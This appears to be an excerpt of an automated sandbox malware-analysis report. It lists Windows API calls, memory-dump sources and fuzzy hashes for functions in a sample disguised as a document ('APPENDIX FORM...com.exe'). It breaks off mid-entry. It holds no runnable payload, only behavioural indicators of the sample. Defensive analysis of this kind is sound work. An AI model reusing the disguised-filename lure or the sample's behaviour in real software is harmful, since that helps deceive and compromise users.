                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1938659011-0
                                                                                                              • Opcode ID: 21b3ca13456913df7ecf9a83f28771301f5dd8d0d5f109a6041254b55da4b22d
                                                                                                              • Instruction ID: eaa6e89d7543b60706da3c0784a7e4b3987c6216cba7da4db185e83c10f24d5b
                                                                                                              • Opcode Fuzzy Hash: 21b3ca13456913df7ecf9a83f28771301f5dd8d0d5f109a6041254b55da4b22d
                                                                                                              • Instruction Fuzzy Hash: DBF0A772F05241EBCB21DF699D44A9B7FE4DF51350B10803BE505F6190D2788541DF59
                                                                                                              Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000,?), ref: 00401DC2
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: b90ebc34d48f5f6f2b7b6904e6f692ecb286efb78e86de713acef272c0c9efdf
                                                                                                              • Instruction ID: f1c19398c416231d93d227be16878f1c2fe596ab023f87486de162efff6a4c17
                                                                                                              • Opcode Fuzzy Hash: b90ebc34d48f5f6f2b7b6904e6f692ecb286efb78e86de713acef272c0c9efdf
                                                                                                              • Instruction Fuzzy Hash: 84E08CB2E04110ABDB24BBB4AE8A56E33A8DB10359B204437E602F10C1D2B89C418A6A
                                                                                                              Function 00405971 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
                                                                                                              • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              • Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                                                                              • Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
                                                                                                              • Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
                                                                                                              • Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16
                                                                                                              Function 0040251B Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2111968516-0
                                                                                                              • Opcode ID: 3e304d8c12eabbb03c9e3c1771f07a0ab05c9e108d19b4d7458f43478658592c
                                                                                                              • Instruction ID: 18492603db55a8b86d8a8ed5bb13c4a1e056a526420789b3d2d2d196f0fb5020
                                                                                                              • Opcode Fuzzy Hash: 3e304d8c12eabbb03c9e3c1771f07a0ab05c9e108d19b4d7458f43478658592c
                                                                                                              • Instruction Fuzzy Hash: 0221C971D04299FEDF215F6449652BEBFB49B01304F24807BE490B63D1D1BC8985CB6D
                                                                                                              Function 00401650 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileMove
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562171763-0
                                                                                                              • Opcode ID: 36159cba8800d61292664bb1bb8cba1ffc953a996d1ebe6357e800a3fac8d15b
                                                                                                              • Instruction ID: 19f5f029a12147ab093ae7c4dd676a36e5c13e74b16b106adef5664a943e3e94
                                                                                                              • Opcode Fuzzy Hash: 36159cba8800d61292664bb1bb8cba1ffc953a996d1ebe6357e800a3fac8d15b
                                                                                                              • Instruction Fuzzy Hash: 8BF0E972A08111A3CF10B7B64E0DD5F22A09F81328F24473BF111B61D5EABC8602E55F
                                                                                                              Function 0040223D Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402276
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 390214022-0
                                                                                                              • Opcode ID: 2a1b67edb7300a1b9d21921cbb3cb49bcdef4d08f11d63e8f50844b58ccc5810
                                                                                                              • Instruction ID: dff1fc4e61f6baddcfaee85270a2ae07bc7b47d3ff6ea6eee97db9607061b2c7
                                                                                                              • Opcode Fuzzy Hash: 2a1b67edb7300a1b9d21921cbb3cb49bcdef4d08f11d63e8f50844b58ccc5810
                                                                                                              • Instruction Fuzzy Hash: CCE04F72B041756ADB903AF10E8DD7F21597B84344F24067EF601B62CAD9BC0D42626D
                                                                                                              Function 004025D5 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025EF
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointerwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 327478801-0
                                                                                                              • Opcode ID: 8eeb5724a902b088ea0ac8a4b68ae52a49c1b4adeb651dce3c54b51496f1246f
                                                                                                              • Instruction ID: 6db1108a9ca3914f7536824f3a0b792d65d6e21d285b9896dce2249a608d269e
                                                                                                              • Opcode Fuzzy Hash: 8eeb5724a902b088ea0ac8a4b68ae52a49c1b4adeb651dce3c54b51496f1246f
                                                                                                              • Instruction Fuzzy Hash: 1DE04FB6A05214ABEB05BBA55E4A9BF676CDB50309B14853BF201F00C1D27D48429A6E
                                                                                                              Function 00402B09 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                                                                              • Instruction ID: 4590d5e2027941592e20b0923a4b77f22b5e160f374441c3e06abea31f55e5d0
                                                                                                              • Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
                                                                                                              • Instruction Fuzzy Hash: BEE0B6B6250109AADB40EFA5ED4AFA677ECFB18705F008125B608E7091CA78E5509B69
                                                                                                              Function 004059E9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00412888,0040A888,004031CB,00409130,00409130,004030BD,00412888,00004000,?,00000000,?), ref: 004059FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                                                                              • Instruction ID: 076bffedcae8d219f388724cca679ee572ad848808916985299d83b930ade598
                                                                                                              • Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
                                                                                                              • Instruction Fuzzy Hash: D2E0BF32654559ABDF10AE559C40AAB775CEB45250F004532BA15F3150D231E8219FA9
                                                                                                              Function 1000272B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002749
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                              • Instruction ID: 613cc9569cd6a3d00a1f47a4ee862bcf7314d86cb88ec258730dacc451f16298
                                                                                                              • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                              • Instruction Fuzzy Hash: B0F092F15092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB3441448B19
                                                                                                              Function 00402281 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString
                                                                                                              • String ID:
                                                                                                              • API String ID: 1096422788-0
                                                                                                              • Opcode ID: e0b3dadd6d67162a4040f0b18513ff5aedf9ef11460ada2f52f1fca357091c3d
                                                                                                              • Instruction ID: bdd16972d33a24d8f715dd244a4521dc24e47ebf505f01b716e53bc3963aa27b
                                                                                                              • Opcode Fuzzy Hash: e0b3dadd6d67162a4040f0b18513ff5aedf9ef11460ada2f52f1fca357091c3d
                                                                                                              • Instruction Fuzzy Hash: 03E08671A44205BADB406FA08D09EBD3668BF01710F10013AF9507B0D5EBB88442B71D
                                                                                                              Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: f010ae61896989df169079360833391b483ba3cad8b6904d41ce71d74b3bca5f
                                                                                                              • Instruction ID: a090e1866cea40bb4f31286ddab35303721e1a880f385a8f940e26b94e66cec2
                                                                                                              • Opcode Fuzzy Hash: f010ae61896989df169079360833391b483ba3cad8b6904d41ce71d74b3bca5f
                                                                                                              • Instruction Fuzzy Hash: F2D01273B04110D7DF00EFB9AF0899D73A4EB44329F208637D111F11D0D6B98542EA29
                                                                                                              Function 004031CE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA6,?), ref: 004031DC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 973152223-0
                                                                                                              • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                              • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                              • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                              • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                              Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                                              Memory Dump Source
